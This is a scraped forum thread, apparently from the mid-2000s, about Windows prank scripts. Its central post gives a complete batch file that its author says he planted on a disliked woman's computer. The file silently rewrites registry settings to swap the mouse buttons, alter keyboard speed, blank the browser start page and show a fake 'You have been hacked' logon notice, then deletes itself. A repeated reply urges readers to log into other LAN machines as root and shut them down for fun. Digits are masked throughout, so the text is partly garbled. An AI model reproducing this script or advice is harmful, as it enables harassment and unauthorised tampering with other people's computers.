Naa, its technology, we cant please everyone, and in the last *0 minutes i've been all over the world. Its my opinion that the good outweighs the bad.
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Naa, its technology, we cant please everyone, and in the last *0 minutes i've been all over the world. Its my opinion that the good outweighs the bad.
How do you stop this batch file from runnning and make the "You have been haked" stop coming on.
That was posted by Syntax****** on 02-*2-2005, 05:*0 AM
I need it to stop running.
[QUOTE=SyntaX******;5*62]I wrote this and placed it in active directory for a woman i was not very keen of. This should be fun for you teacher to deal with.
Put This Under All Users and make her log onto your computer...
SAVE AS WinHelp.BAT and place the file here
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
echo off
echo REGEDIT4 >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
echo "SwapMouseButtons"="*" >> c:\reg.reg
echo "MouseSpeed"="*" >> c:\reg.reg
echo "DoubleClickSpeed"="*00" >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Key***rd] >> c:\reg.reg
echo "Key***rdDelay"="5" >> c:\reg.reg
echo "Key***rdSpeed"="*0" >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main] >> c:\reg.reg
echo "Start Page"="" >> c:\reg.reg
echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
echo "PaintDesktopVersion"=dword:* >> c:\reg.reg
echo. >> c:\reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> c:\reg.reg
echo "LegalNoticeCaption"="YoU HaVe BeeN HacKeD" >> c:\reg.reg
echo "LegalNoticeText"="Please contact *-800-255-*700" >> c:\reg.reg
REGEDIT /s c:\reg.reg
start iexplore.exe [url][/url]
start iexplore.exe [url][/url]
start iexplore.exe [url][/url]
del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\winhelp.bat"
Edited for links.[/QUOTE]
I haven't read the whole thread or really what this is about but you should be able to press Ctrl+C to stop anything running in a command prompt. As something else I don't know if anyone else has added this but the command prompt shutdown tool can be used to stop Windows from shutting down. Say you ended a critical process such as smss and Windows gives you that Windows must shutdown message, you can open a command prompt and stop the shutdown by typing something like "shutdown -a" and the pop up will disappear.
to shutdown a computer, if you are running on windows, you could use something like SSH, in linux you can conect to another terminal of you LAN, if you know the ipīs an the user/password, try to do it.....
*.-go to terminal
2.-log like root
*.-type this...."ssh login@ipadress" (ssh sirgrifin@**2.*68.*.64) hit enter.
4.- its going to ask you for the password, you have to type it and hit enter again, now you are conected with this pc in a terminal via telnet.
5.- now you are conected via telnet for some port i dont remeber, now log like root on this computer, using "su" and type the pass the same u use to get into this computer...
6.- to shouting down you just comands like "halt" "shut down now" "reeboot" things like this and by this way u can do it.:D
well about windows there are a lot of programs you can install on you pc, in you LAN, and run it knowing the ips and enjoy you damn free time shuting down computers.....:D
to shutdown a computer, if you are running on windows, you could use something like SSH, in linux you can conect to another terminal of you LAN, if you know the ipīs an the user/password, try to do it.....
*.-go to terminal
2.-log like root
*.-type this...."ssh login@ipadress" (ssh sirgrifin@**2.*68.*.64) hit enter.
4.- its going to ask you for the password, you have to type it and hit enter again, now you are conected with this pc in a terminal via telnet.
5.- now you are conected via telnet for some port i dont remeber, now log like root on this computer, using "su" and type the pass the same u use to get into this computer...
6.- to shouting down you just comands like "halt" "shut down now" "reeboot" things like this and by this way u can do it.:D
well about windows there are a lot of programs you can install on you pc, in you LAN, and run it knowing the ips and enjoy you damn free time shuting down computers.....:D
Try this small utility!